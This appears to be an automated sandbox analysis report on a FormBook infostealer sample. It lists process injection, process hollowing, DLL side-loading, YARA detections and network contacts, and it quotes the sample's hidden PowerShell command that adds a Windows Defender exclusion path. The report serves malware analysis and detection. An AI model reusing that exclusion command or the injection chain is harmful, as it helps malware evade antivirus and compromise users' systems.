        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B1A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACF527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACF527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACF527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5E539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9AD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B53518 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B53518 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B53518 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9354C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9354C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD3D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B13540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B43D40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB7D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD4D51 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD4D51 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B556B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B556B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B22EA3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B146A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A93E80 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A93E80 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACDE9E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACDE9E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACDE9E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA76E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD3EE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD3EE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD3EE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC36CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4FE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD0E21 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9A63B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9A63B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B22E14 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_00007FF61AD32418 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Citvon\Citvon.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Citvon\Citvon.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_613C1BC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_00007FF61AD33B90 SetUnhandledExceptionFilter,
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_00007FF61AD338E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeDomain query: www.thrg33.club
        Source: C:\Windows\explorer.exeDomain query: www.georgeswebwerks.com
        Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
        Adds a directory exclusion to Windows DefenderShow sources
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        DLL side loading technique detectedShow sources
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\System32\netutils.dll
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeMemory written: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\Public\Citvon\Citvon.exeMemory written: C:\Users\Public\Citvon\Citvon.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\Public\Citvon\Citvon.exeMemory written: C:\Users\Public\Citvon\Citvon.exe base: 400000 value starts with: 4D5A
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\Public\Citvon\Citvon.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\Public\Citvon\Citvon.exeThread register set: target process: 3424
        Source: C:\Users\Public\Citvon\Citvon.exeThread register set: target process: 3424
        Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3424
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\Public\Citvon\Citvon.exeThread APC queued: target process: C:\Windows\explorer.exe
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\Public\Citvon\Citvon.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B60000
        Source: C:\Users\Public\Citvon\Citvon.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1340000
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\Netplwiz.exe C:\Windows \System32\Netplwiz.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Users\Public\Citvon\Citvon.exeProcess created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Users\Public\Citvon\Citvon.exeProcess created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: explorer.exe, 0000001A.00000002.915848941.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
        Source: C:\Windows \System32\Netplwiz.exeCode function: HeapSetInformation,memset,LoadCursorW,GetStockObject,RegisterClassW,GetUserDefaultUILanguage,GetLocaleInfoW,CreateWindowExW,GetLastError,CreateWindowExW,UsersRunDllW,DestroyWindow,
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_613C1AE0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
        Source: C:\Users\Public\Citvon\Citvon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
